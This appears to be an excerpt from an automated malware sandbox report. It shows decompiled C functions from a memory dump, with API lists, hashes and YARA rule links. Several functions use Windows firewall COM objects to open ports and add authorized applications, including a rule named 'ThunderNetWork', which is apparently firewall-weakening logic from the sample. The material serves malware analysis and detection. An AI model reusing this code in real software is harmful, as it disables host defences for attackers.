                                                                                                                                                0x00bf19ca
                                                                                                                                                0x00bf19ce
                                                                                                                                                0x00bf19d4
                                                                                                                                                0x00bf19d9
                                                                                                                                                0x00bf19de
                                                                                                                                                0x00bf19e1
                                                                                                                                                0x00bf19e5
                                                                                                                                                0x00bf19eb
                                                                                                                                                0x00bf19f0
                                                                                                                                                0x00bf19f5
                                                                                                                                                0x00bf19f8
                                                                                                                                                0x00bf19fc
                                                                                                                                                0x00bf1a0b
                                                                                                                                                0x00bf1a11
                                                                                                                                                0x00bf1a17
                                                                                                                                                0x00bf1a1b
                                                                                                                                                0x00bf1a31
                                                                                                                                                0x00bf1a33
                                                                                                                                                0x00bf1a37
                                                                                                                                                0x00bf1a3d
                                                                                                                                                0x00bf1a43
                                                                                                                                                0x00bf1a4a
                                                                                                                                                0x00bf1a59
                                                                                                                                                0x00bf1a5b
                                                                                                                                                0x00bf1a64
                                                                                                                                                0x00bf1a67
                                                                                                                                                0x00bf1a70
                                                                                                                                                0x00bf1a84
                                                                                                                                                0x00bf1a87
                                                                                                                                                0x00bf1a8f
                                                                                                                                                0x00bf1a92
                                                                                                                                                0x00bf1a9a
                                                                                                                                                0x00bf1a9d
                                                                                                                                                0x00bf1aa5
                                                                                                                                                0x00bf1aa8
                                                                                                                                                0x00bf1aad
                                                                                                                                                0x00bf1ab2
                                                                                                                                                0x00bf1ab5
                                                                                                                                                0x00bf1ab9
                                                                                                                                                0x00bf1abb
                                                                                                                                                0x00bf1ac7
                                                                                                                                                0x00bf1ac7
                                                                                                                                                0x00bf1ab9
                                                                                                                                                0x00bf1ac9
                                                                                                                                                0x00bf1ac9
                                                                                                                                                0x00bf1a37
                                                                                                                                                0x00bf1a1b
                                                                                                                                                0x00bf19fc
                                                                                                                                                0x00bf19e5
                                                                                                                                                0x00bf19ce
                                                                                                                                                0x00bf1acb
                                                                                                                                                0x00bf1ad0
                                                                                                                                                0x00bf1ad5
                                                                                                                                                0x00bf1ad5
                                                                                                                                                0x00bf1ad8
                                                                                                                                                0x00bf1add
                                                                                                                                                0x00bf1ae2
                                                                                                                                                0x00bf1ae2
                                                                                                                                                0x00bf1ae5
                                                                                                                                                0x00bf1aea
                                                                                                                                                0x00bf1aef
                                                                                                                                                0x00bf1aef
                                                                                                                                                0x00bf1af2
                                                                                                                                                0x00bf1af7
                                                                                                                                                0x00bf1afc
                                                                                                                                                0x00bf1afc
                                                                                                                                                0x00bf1aff
                                                                                                                                                0x00bf1b04
                                                                                                                                                0x00bf1b09
                                                                                                                                                0x00bf1b09
                                                                                                                                                0x00bf1b0c
                                                                                                                                                0x00bf1b22

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF197E
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF199C
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF19A2
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF19C8
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1A0B
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00BF1A11
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF1A31
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1A7B
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF1B0C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
                                                                                                                                                • API String ID: 3570467124-3777566516
                                                                                                                                                • Opcode ID: 77543c66596f5b4a03e87d75bfb9b8cb90f07e5a86634bee95de258958a053d1
                                                                                                                                                • Instruction ID: 90ffb7d9d07d8225db437a54555a3528ebe084c2fe268de1a5391f7cafc8063b
                                                                                                                                                • Opcode Fuzzy Hash: 77543c66596f5b4a03e87d75bfb9b8cb90f07e5a86634bee95de258958a053d1
                                                                                                                                                • Instruction Fuzzy Hash: F051E575A0121DAFCB00DFE8C8899AEBBB9EF4C710B144895F602EB251DB75A945CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF323D, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00BF323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0xbfdd18);
				E00BF3F70(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00BF2003(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0xbfc870;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0xbff010;
				E00BF3C3D(_t35, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00BF3312();
				E00BF3C3D(_t35, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0xbff618; // 0xbff540
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00BF2EFA( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00BF3FB5(E00BF331B());
			}








                                                                                                                                                0x00bf323d
                                                                                                                                                0x00bf323d
                                                                                                                                                0x00bf323f
                                                                                                                                                0x00bf3244
                                                                                                                                                0x00bf3249
                                                                                                                                                0x00bf324f
                                                                                                                                                0x00bf3257
                                                                                                                                                0x00bf325a
                                                                                                                                                0x00bf325f
                                                                                                                                                0x00bf3260
                                                                                                                                                0x00bf3263
                                                                                                                                                0x00bf3266
                                                                                                                                                0x00bf3270
                                                                                                                                                0x00bf3275
                                                                                                                                                0x00bf327d
                                                                                                                                                0x00bf3285
                                                                                                                                                0x00bf3295
                                                                                                                                                0x00bf3295
                                                                                                                                                0x00bf329b
                                                                                                                                                0x00bf329e
                                                                                                                                                0x00bf32a5
                                                                                                                                                0x00bf32ac
                                                                                                                                                0x00bf32b5
                                                                                                                                                0x00bf32bb
                                                                                                                                                0x00bf32c2
                                                                                                                                                0x00bf32c8
                                                                                                                                                0x00bf32cf
                                                                                                                                                0x00bf32d6
                                                                                                                                                0x00bf32dc
                                                                                                                                                0x00bf32df
                                                                                                                                                0x00bf32e2
                                                                                                                                                0x00bf32e7
                                                                                                                                                0x00bf32e9
                                                                                                                                                0x00bf32ee
                                                                                                                                                0x00bf32ee
                                                                                                                                                0x00bf32f4
                                                                                                                                                0x00bf32fa
                                                                                                                                                0x00bf330b

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BFDD18,0000000C,00BF3378,00000000,00000000,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF324F
                                                                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00BF325A
                                                                                                                                                  • Part of subcall function 00BF2003: Sleep.KERNEL32(000003E8,00000000,?,00BF31A0,KERNEL32.DLL,?,00BF31EC,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF200F
                                                                                                                                                  • Part of subcall function 00BF2003: GetModuleHandleW.KERNEL32(00000000,?,00BF31A0,KERNEL32.DLL,?,00BF31EC,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF2018
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00BF3283
                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00BF3293
                                                                                                                                                • __lock.LIBCMT ref: 00BF32B5
                                                                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00BF32C2
                                                                                                                                                • __lock.LIBCMT ref: 00BF32D6
                                                                                                                                                • ___addlocaleref.LIBCMT ref: 00BF32F4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                • API String ID: 1028249917-2843748187
                                                                                                                                                • Opcode ID: 812a9910cb5db97eab8bcd199025d34cf760a4d5648d51cd21a626c599e12ae7
                                                                                                                                                • Instruction ID: 4fedf68be2d6dd6e88068dbfb92a24b4b91fa2c40b2fa9fa7df84ba0018fa39a
                                                                                                                                                • Opcode Fuzzy Hash: 812a9910cb5db97eab8bcd199025d34cf760a4d5648d51cd21a626c599e12ae7
                                                                                                                                                • Instruction Fuzzy Hash: 2311D27190070DDAD720EF79D901B7ABBE0EF00714F104499E6A9E32A1CF74AA88CF54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF1191, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176commemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E00BF1191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t67;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				char* _t110;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t138;

				_t131 = __edx;
				_t134 = __eax;
				_v44 = 0;
				_t110 = 0x80004005;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = E00BF80F0(__edx, _a4);
				_t67 = E00BF80F0(__edx, "ThunderNetWork");
				_v36 = _t67;
				_v28 = 0x100;
				__imp__#2(L"LAN");
				_v40 = _t67;
				E00BF80F0(__edx, _a8);
				_v32 = 0;
				if(E00BF1071(_t134,  &_v28,  &_v32) == 0) {
					_t135 = _v44;
				} else {
					_t80 = E00BF80F0(_t131, E00BF1C70(_t134, ":") + 1);
					_t138 = _t80;
					__imp__CoInitializeEx(0, 2);
					_t135 = _t80;
					if(_t135 == 0x80010106 || _t135 >= 0) {
						_t110 = E00BF1058( &_v20,  &_v20);
						if(_t110 >= 0) {
							_t83 = _v20;
							_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
							if(_t110 >= 0) {
								_t85 = _v20;
								_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
								if(_t110 >= 0) {
									if((_v12 & 0x00000004) != 0 && _v12 != 4) {
										_v12 = _v12 ^ 0x00000004;
									}
									_t87 =  &_v8;
									__imp__CoCreateInstance(0xbfdb2c, 0, 1, 0xbfdb3c, _t87);
									_t110 = _t87;
									if(_t110 >= 0) {
										_t88 = _v16;
										 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
										_t90 = _v8;
										 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
										_t92 = _v8;
										 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
										_t94 = _v8;
										 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
										_t96 = _v8;
										 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
										_t98 = _v8;
										 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
										_t100 = _v8;
										 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
										_t102 = _v8;
										 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
										_t104 = _v8;
										 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
										_t106 = _v8;
										 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
										_t108 = _v16;
										_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
									}
								}
							}
						}
					}
				}
				_t71 = _v8;
				if(_t71 != 0) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *((intOrPtr*)( *_t72 + 8))(_t72);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					 *((intOrPtr*)( *_t73 + 8))(_t73);
				}
				if(_t135 >= 0) {
					__imp__CoUninitialize();
				}
				return _t110;
			}






































                                                                                                                                                0x00bf1191
                                                                                                                                                0x00bf119f
                                                                                                                                                0x00bf11a1
                                                                                                                                                0x00bf11a4
                                                                                                                                                0x00bf11a9
                                                                                                                                                0x00bf11ac
                                                                                                                                                0x00bf11af
                                                                                                                                                0x00bf11b2
                                                                                                                                                0x00bf11bf
                                                                                                                                                0x00bf11c2
                                                                                                                                                0x00bf11cc
                                                                                                                                                0x00bf11cf
                                                                                                                                                0x00bf11d6
                                                                                                                                                0x00bf11df
                                                                                                                                                0x00bf11e2
                                                                                                                                                0x00bf11ea
                                                                                                                                                0x00bf11f9
                                                                                                                                                0x00bf1337
                                                                                                                                                0x00bf11ff
                                                                                                                                                0x00bf120e
                                                                                                                                                0x00bf1217
                                                                                                                                                0x00bf1219
                                                                                                                                                0x00bf121f
                                                                                                                                                0x00bf1227
                                                                                                                                                0x00bf123a
                                                                                                                                                0x00bf123f
                                                                                                                                                0x00bf1245
                                                                                                                                                0x00bf1252
                                                                                                                                                0x00bf1256
                                                                                                                                                0x00bf125c
                                                                                                                                                0x00bf1269
                                                                                                                                                0x00bf126d
                                                                                                                                                0x00bf1277
                                                                                                                                                0x00bf127f
                                                                                                                                                0x00bf127f
                                                                                                                                                0x00bf1283
                                                                                                                                                0x00bf1295
                                                                                                                                                0x00bf129b
                                                                                                                                                0x00bf129f
                                                                                                                                                0x00bf12a5
                                                                                                                                                0x00bf12ae
                                                                                                                                                0x00bf12b1
                                                                                                                                                0x00bf12ba
                                                                                                                                                0x00bf12bd
                                                                                                                                                0x00bf12c6
                                                                                                                                                0x00bf12c9
                                                                                                                                                0x00bf12d2
                                                                                                                                                0x00bf12d5
                                                                                                                                                0x00bf12de
                                                                                                                                                0x00bf12e4
                                                                                                                                                0x00bf12ec
                                                                                                                                                0x00bf12f2
                                                                                                                                                0x00bf12fa
                                                                                                                                                0x00bf1300
                                                                                                                                                0x00bf1309
                                                                                                                                                0x00bf130f
                                                                                                                                                0x00bf1316
                                                                                                                                                0x00bf1319
                                                                                                                                                0x00bf1321
                                                                                                                                                0x00bf1327
                                                                                                                                                0x00bf1333
                                                                                                                                                0x00bf1333
                                                                                                                                                0x00bf129f
                                                                                                                                                0x00bf126d
                                                                                                                                                0x00bf1256
                                                                                                                                                0x00bf123f
                                                                                                                                                0x00bf1227
                                                                                                                                                0x00bf133a
                                                                                                                                                0x00bf133f
                                                                                                                                                0x00bf1344
                                                                                                                                                0x00bf1344
                                                                                                                                                0x00bf1347
                                                                                                                                                0x00bf134c
                                                                                                                                                0x00bf1351
                                                                                                                                                0x00bf1351
                                                                                                                                                0x00bf1354
                                                                                                                                                0x00bf1359
                                                                                                                                                0x00bf135e
                                                                                                                                                0x00bf135e
                                                                                                                                                0x00bf1363
                                                                                                                                                0x00bf1365
                                                                                                                                                0x00bf1365
                                                                                                                                                0x00bf1371

                                                                                                                                                APIs
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11B5
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11C2
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • SysAllocString.OLEAUT32(LAN), ref: 00BF11D6
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11E2
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF120E
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00BF1219
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF1295
                                                                                                                                                • CoUninitialize.OLE32(?), ref: 00BF1365
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                • String ID: LAN$ThunderNetWork
                                                                                                                                                • API String ID: 1199507461-1899760959
                                                                                                                                                • Opcode ID: c7eaaf2697e9910cceaaf239652397b7458c4c8506b9a4b49e4ed8200f78513c
                                                                                                                                                • Instruction ID: a4d4fe96d0d6048c593d48a3122316a0646b83e3cdf96b2f7dfa494535805e62
                                                                                                                                                • Opcode Fuzzy Hash: c7eaaf2697e9910cceaaf239652397b7458c4c8506b9a4b49e4ed8200f78513c
                                                                                                                                                • Instruction Fuzzy Hash: D9611E75A00209EFCB00DFE4C888AAE7BF9FF49314F104899FA05EB251DB759945CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF1567, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                			E00BF1567(char* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t38;
				char* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t51;
				intOrPtr* _t52;
				char* _t53;
				intOrPtr* _t54;
				char* _t55;
				char* _t58;
				intOrPtr* _t59;
				char* _t60;
				intOrPtr* _t75;
				signed int _t78;

				_t74 = __edx;
				_t34 =  *0xbff008; // 0xf1c81c65
				_v12 = _t34 ^ _t78;
				_v48 = _a4;
				__imp__CoInitialize(0);
				_v44 = 0;
				_v36 = 0;
				_v40 = 0;
				_v32 = 0;
				_t38 = E00BF80F0(__edx, "HNetCfg.FwMgr");
				_t75 = __imp__CLSIDFromProgID;
				_t39 =  *_t75(_t38,  &_v28);
				_t76 = _t39;
				if(_t39 == 0) {
					_t51 =  &_v28;
					__imp__CoCreateInstance(_t51, 0, 5, 0xbfc17c,  &_v44);
					_t76 = _t51;
					if(_t51 >= 0) {
						_t52 = _v44;
						_t74 =  &_v36;
						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
						_t76 = _t53;
						if(_t53 >= 0) {
							_t54 = _v36;
							_t74 =  &_v40;
							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
							_t76 = _t55;
							if(_t55 >= 0) {
								_t58 =  *_t75(E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
								_t76 = _t58;
								if(_t58 >= 0) {
									_t59 = _v40;
									_t74 =  &_v32;
									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
									_t76 = _t60;
									if(_t60 >= 0) {
										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E00BF80F0( &_v32, _v48));
									}
								}
							}
						}
					}
				}
				_t40 = _v32;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v40;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				_t42 = _v36;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42 + 8))(_t42);
				}
				_t43 = _v44;
				if(_t43 != 0) {
					 *((intOrPtr*)( *_t43 + 8))(_t43);
				}
				__imp__CoUninitialize();
				return E00BF1C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
			}






























                                                                                                                                                0x00bf1567
                                                                                                                                                0x00bf156d
                                                                                                                                                0x00bf1574
                                                                                                                                                0x00bf1580
                                                                                                                                                0x00bf1583
                                                                                                                                                0x00bf1592
                                                                                                                                                0x00bf1595
                                                                                                                                                0x00bf1598
                                                                                                                                                0x00bf159b
                                                                                                                                                0x00bf159e
                                                                                                                                                0x00bf15a3
                                                                                                                                                0x00bf15aa
                                                                                                                                                0x00bf15ac
                                                                                                                                                0x00bf15b0
                                                                                                                                                0x00bf15c2
                                                                                                                                                0x00bf15c6
                                                                                                                                                0x00bf15cc
                                                                                                                                                0x00bf15d0
                                                                                                                                                0x00bf15d2
                                                                                                                                                0x00bf15d7
                                                                                                                                                0x00bf15dc
                                                                                                                                                0x00bf15df
                                                                                                                                                0x00bf15e3
                                                                                                                                                0x00bf15e5
                                                                                                                                                0x00bf15ea
                                                                                                                                                0x00bf15ef
                                                                                                                                                0x00bf15f2
                                                                                                                                                0x00bf15f6
                                                                                                                                                0x00bf1607
                                                                                                                                                0x00bf1609
                                                                                                                                                0x00bf160d
                                                                                                                                                0x00bf160f
                                                                                                                                                0x00bf1614
                                                                                                                                                0x00bf1619
                                                                                                                                                0x00bf161c
                                                                                                                                                0x00bf1620
                                                                                                                                                0x00bf1636
                                                                                                                                                0x00bf1636
                                                                                                                                                0x00bf1620
                                                                                                                                                0x00bf160d
                                                                                                                                                0x00bf15f6
                                                                                                                                                0x00bf15e3
                                                                                                                                                0x00bf15d0
                                                                                                                                                0x00bf1638
                                                                                                                                                0x00bf163d
                                                                                                                                                0x00bf1642
                                                                                                                                                0x00bf1642
                                                                                                                                                0x00bf1645
                                                                                                                                                0x00bf164a
                                                                                                                                                0x00bf164f
                                                                                                                                                0x00bf164f
                                                                                                                                                0x00bf1652
                                                                                                                                                0x00bf1657
                                                                                                                                                0x00bf165c
                                                                                                                                                0x00bf165c
                                                                                                                                                0x00bf165f
                                                                                                                                                0x00bf1664
                                                                                                                                                0x00bf1669
                                                                                                                                                0x00bf1669
                                                                                                                                                0x00bf166c
                                                                                                                                                0x00bf1682

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF1583
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF159E
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF15AA
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF15C6
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1601
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1607
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF162A
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF166C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
